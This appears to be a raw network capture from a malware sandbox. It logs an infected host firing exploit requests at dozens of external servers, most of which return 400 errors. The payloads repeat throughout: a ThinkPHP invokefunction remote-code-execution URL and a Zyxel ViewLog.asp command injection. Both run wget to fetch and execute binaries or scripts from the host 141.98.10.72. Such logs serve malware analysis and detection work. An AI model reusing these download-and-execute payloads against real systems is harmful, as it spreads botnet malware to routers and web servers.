                                                        Feb 14, 2024 09:33:21.683376074 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:21.996536970 CET339INHTTP/1.1 400 Bad Request
                                                        Server: 1.14.4-1.el7.centos
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 180
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 31 2e 31 34 2e 34 2d 31 2e 65 6c 37 2e 63 65 6e 74 6f 73 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>1.14.4-1.el7.centos</center></body></html>
                                                        Feb 14, 2024 09:33:22.215838909 CET339INHTTP/1.1 400 Bad Request
                                                        Server: 1.14.4-1.el7.centos
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 180
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 31 2e 31 34 2e 34 2d 31 2e 65 6c 37 2e 63 65 6e 74 6f 73 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>1.14.4-1.el7.centos</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.144436694.137.97.2168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:21.856822014 CET334INHTTP/1.0 400 Bad Request
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Wed, 14 Feb 2024 08:33:21 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.1453170112.15.125.680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:22.436208010 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:22.850419998 CET358INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:22 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 213
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-7</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.144322488.198.209.1480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:22.637654066 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:22.839826107 CET427INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:22 GMT
                                                        Server: Apache
                                                        X-Frame-Options: DENY
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.145725288.221.224.16080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:22.650022030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:22.864046097 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:22 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:22 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 37 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 30 32 26 23 34 36 3b 33 39 31 31 66 31 66 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;279b1702&#46;1707899602&#46;3911f1f5</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.144737088.81.91.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:22.654675961 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:22.874828100 CET329INHTTP/1.0 400 Bad Request
                                                        Cache-Control: no-store
                                                        Connection: close
                                                        Content-Length: 103
                                                        Content-Type: text/html
                                                        Date: Wed, 14 Feb 2024 08:33:22 GMT
                                                        Expires: 0
                                                        Pragma: no-cache
                                                        X-Frame-Options: sameorigin
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a
                                                        Data Ascii: <!doctype html><html lang=en><title>Error 400 : Bad Request</title><h1>Error 400 : Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.1435182112.60.23.22280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:22.821254969 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:23.201917887 CET293INHTTP/1.1 400 Bad Request
                                                        Server: stgw
                                                        Date: Wed, 14 Feb 2024 08:33:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 149
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>stgw</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.144077631.136.78.958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.938733101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.584253073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.865910053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.553633928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.671920061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.911500931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:04.390626907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349026918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.144167295.79.113.78080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.952683926 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.146096694.121.66.338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.970233917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.145407094.123.21.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.971877098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.145111862.29.55.718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.971947908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.145141894.122.30.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.972332001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.143753694.120.235.368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:23.972709894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.145166095.164.131.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.064101934 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.183276892 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/6.0.0-20220501-re899e0c27
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:33:24 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3572
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        Cache-Status: ezproxies.com
                                                        Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                        Connection: close
